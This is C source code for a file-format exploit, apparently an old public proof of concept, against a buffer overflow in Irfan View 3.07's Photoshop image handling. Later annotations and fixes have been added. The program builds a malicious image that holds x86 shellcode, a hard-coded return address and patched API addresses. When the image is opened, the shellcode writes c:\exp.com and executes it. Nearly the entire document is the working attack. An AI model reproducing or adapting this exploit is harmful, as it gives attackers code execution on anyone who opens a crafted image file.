The popular image viewer "Irfan View32" contains a buffer overflow; the problem exists in its handling of Adobe Photoshop image files. This code generates a jpg file containing exploit code that creates "exp.com" in "c:\" and executes it. "exp.com" is a simple demo program and is harmless.
5a4c0197a83f99d759c5a6f2d4a089f21af960881b1053185810e9ea7530d600
/*=============================================================================
Irfan View 3.07 Exploit
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#define MAXBUF 0x22e0          /* size in bytes of the generated file (main() writes exactly this many) */
#define RETADR 0x31E           /* offset in the output buffer where the two fixed 32-bit values below are stored */
#define FAKE_ADR 0x80101010    /* stored little-endian at RETADR+8..+11; fixed value, presumably a Windows 9x-era address -- not verified here */
#define JMPESP_ADR 0xbffca4f7  /* stored little-endian at RETADR..+3; fixed value, presumably a Windows 9x-era kernel32 address -- not verified here */
#define HEAD "8BPS\0"          /* file signature copied to offset 0 ("8BPS" is the Photoshop header named in the description) */
/* Payload bytes that main() copies into the output file at RETADR+12 after
 * patching them: offsets 0x1f..0x22 receive the address of LoadLibrary, the
 * four offsets listed in GetProcAddress_fcp receive the address of
 * GetProcAddress, and offsets 0x1c, 0x6d and 0x77 receive string lengths.
 * The string table built in main() is appended after the trailing 0x00, so
 * the array is sized larger (300) than the initializer. */
unsigned char exploit_code[300]={
0xEB,0x4F,0x5F,0x32,0xC0,0x88,0x47,0x0A,0x88,0x47,0x10,0x88,0x47,0x17,0x88,0x47,
0x1E,0x88,0x47,0x23,0x88,0x47,0x26,0x88,0x47,0x2D,0x88,0x47,0x3C,0x57,0xB8,0x50,
0x77,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xDB,0xB3,0x0B,0x8B,0xC7,0x03,0xC3,0x50,
0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xC8,0x33,0xDB,0xB3,0x24,0x8B,0xC7,
0x03,0xC3,0x50,0xB3,0x32,0x8B,0xC7,0x03,0xC3,0x50,0xFF,0xD1,0x89,0x47,0x2E,0xEB,
0x02,0xEB,0x71,0x33,0xDB,0xB3,0x18,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,
0xF7,0xBF,0xFF,0xD0,0x8B,0xC8,0x8B,0x47,0x2E,0x50,0x33,0xC0,0xB0,0x03,0x90,0x90,
0x50,0xB0,0x01,0x50,0x33,0xDB,0xB3,0x3D,0x03,0xDF,0x53,0xFF,0xD1,0x33,0xDB,0xB3,
0x11,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0x5F,
0x2E,0x53,0xFF,0xD0,0x33,0xDB,0xB3,0x27,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,
0x6E,0xF7,0xBF,0xFF,0xD0,0x33,0xDB,0xB3,0x32,0x8B,0xCF,0x03,0xCB,0x51,0xFF,0xD0,
0x33,0xDB,0x53,0xB3,0x1F,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,0xF7,0xBF,
0xFF,0xD0,0xFF,0xD0,0xE8,0x39,0xFF,0xFF,0xFF,0x00
};
/* Appended to the string table by main(); its length (strlen) is patched into
 * exploit_code[0x6d].  Per the description this is presumably the contents of
 * the demo "exp.com" that gets written out -- not verified here. */
unsigned char exploit_data[1000]={
0xb0,0x13,0xcd,0x10,0xb0,0x0f,0xfe,0xc0,0xb4,0x0c,0xcd,0x10,0x03,0xd1,0x41,0x3c,
0x20,0x77,0xf1,0xeb,0xf1,0x00
};
/* Offsets inside exploit_code that main() overwrites with the 4-byte
 * (little-endian) address of GetProcAddress. */
int GetProcAddress_fcp[4]={0x32,0x5e,0x88,0xbc};
/* '_'-separated table of a DLL name and function names.  main() appends
 * filename, "_" and exploit_data to it before copying the whole table after
 * the payload; 1000 bytes leaves ample room for those appends. */
char string_buffer[1000] ="msvcrt.dll_fopen_fclose_fwrite_exit_wb_system_****";
/* Path of the file the payload creates, per the description above. */
char filename[100] = "c:\\exp.com";
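/*
 * Program entry point: builds the crafted "8BPS" file described in the
 * header comment and writes it to argv[1].
 *
 * The output is MAXBUF bytes of 0x90 with the file signature at offset 0,
 * two fixed 32-bit values (JMPESP_ADR, FAKE_ADR) plus two constant bytes
 * at offset RETADR, and the patched exploit_code followed by its string
 * table at RETADR+12.
 *
 * argv[1]  path of the file to write (binary mode)
 * Returns 0 on success.  Calls exit(1) on a usage error, when the output
 * cannot be opened, or when the write is short or fclose() fails.
 *
 * Portability: the casts of LoadLibrary/GetProcAddress to unsigned int and
 * the fixed addresses only make sense for a 32-bit Windows process of the
 * era this was written for; on a 64-bit build the casts truncate.
 */
int main(int argc, char *argv[])
{
    /* Image bytes; written with fwrite() by length, so no NUL terminator is
     * needed.  (The original also did buf[MAXBUF]=0, a one-past-the-end
     * write, which is undefined behaviour -- removed.) */
    unsigned char buf[MAXBUF];
    /* Lengths stored as single payload bytes; truncation to 8 bits is
     * intended because they are written into one-byte slots below. */
    unsigned char l1, l2;
    unsigned int ip, p1, p2, i;
    FILE *fp;

    if (argc < 2) {
        printf("usage : %s outputfile\n", argv[0]);
        exit(1);
    }

    memset(buf, 0x90, MAXBUF);
    memcpy(buf, HEAD, 4);

    /* JMPESP_ADR little-endian at RETADR..RETADR+3. */
    ip = JMPESP_ADR;
    buf[RETADR]     = ip & 0xff;
    buf[RETADR + 1] = (ip >> 8) & 0xff;
    buf[RETADR + 2] = (ip >> 16) & 0xff;
    buf[RETADR + 3] = (ip >> 24) & 0xff;

    /* Two constant bytes, then FAKE_ADR little-endian at RETADR+8..+11. */
    buf[RETADR + 6] = 0xeb;
    buf[RETADR + 7] = 0x04;
    ip = FAKE_ADR;
    buf[RETADR + 8]  = ip & 0xff;
    buf[RETADR + 9]  = (ip >> 8) & 0xff;
    buf[RETADR + 10] = (ip >> 16) & 0xff;
    buf[RETADR + 11] = (ip >> 24) & 0xff;

    /* Patch the run-time addresses of LoadLibrary (offsets 0x1f..0x22) and
     * GetProcAddress (each offset in GetProcAddress_fcp) into the payload. */
    p1 = (unsigned int)LoadLibrary;
    p2 = (unsigned int)GetProcAddress;
    exploit_code[0x1f] = p1 & 0xff;
    exploit_code[0x20] = (p1 >> 8) & 0xff;
    exploit_code[0x21] = (p1 >> 16) & 0xff;
    exploit_code[0x22] = (p1 >> 24) & 0xff;
    for (i = 0; i < 4; i++) {
        exploit_code[GetProcAddress_fcp[i]]     = p2 & 0xff;
        exploit_code[GetProcAddress_fcp[i] + 1] = (p2 >> 8) & 0xff;
        exploit_code[GetProcAddress_fcp[i] + 2] = (p2 >> 16) & 0xff;
        exploit_code[GetProcAddress_fcp[i] + 3] = (p2 >> 24) & 0xff;
    }

    /* Build the string table: names + filename + "_" + exploit_data.  l1 is
     * taken before the appends, matching the original ordering. */
    l1 = strlen(filename) + strlen(string_buffer);
    l2 = strlen((char *)exploit_data);
    strcat(string_buffer, filename);
    strcat(string_buffer, "_");
    strcat(string_buffer, (char *)exploit_data);

    /* The table is appended to the payload in place; make sure it fits in
     * exploit_code before strcat() (the original did not check). */
    if (strlen((char *)exploit_code) + strlen(string_buffer) >= sizeof exploit_code) {
        printf("Payload too large\n");
        exit(1);
    }
    strcat((char *)exploit_code, string_buffer);
    exploit_code[0x1c] = l1;
    exploit_code[0x6d] = l2;
    exploit_code[0x77] = l1 + 1;
    memcpy(buf + RETADR + 12, exploit_code, strlen((char *)exploit_code));

    if ((fp = fopen(argv[1], "wb")) == NULL) {
        printf("Can not write file '%s'\n", argv[1]);
        exit(1);
    }
    /* A short write or a failed fclose() leaves an unusable file; the
     * original ignored both return values. */
    if (fwrite(buf, 1, MAXBUF, fp) != MAXBUF) {
        printf("Can not write file '%s'\n", argv[1]);
        fclose(fp);
        exit(1);
    }
    if (fclose(fp) != 0) {
        printf("Can not write file '%s'\n", argv[1]);
        exit(1);
    }
    printf("Done.\n");
    return 0;
}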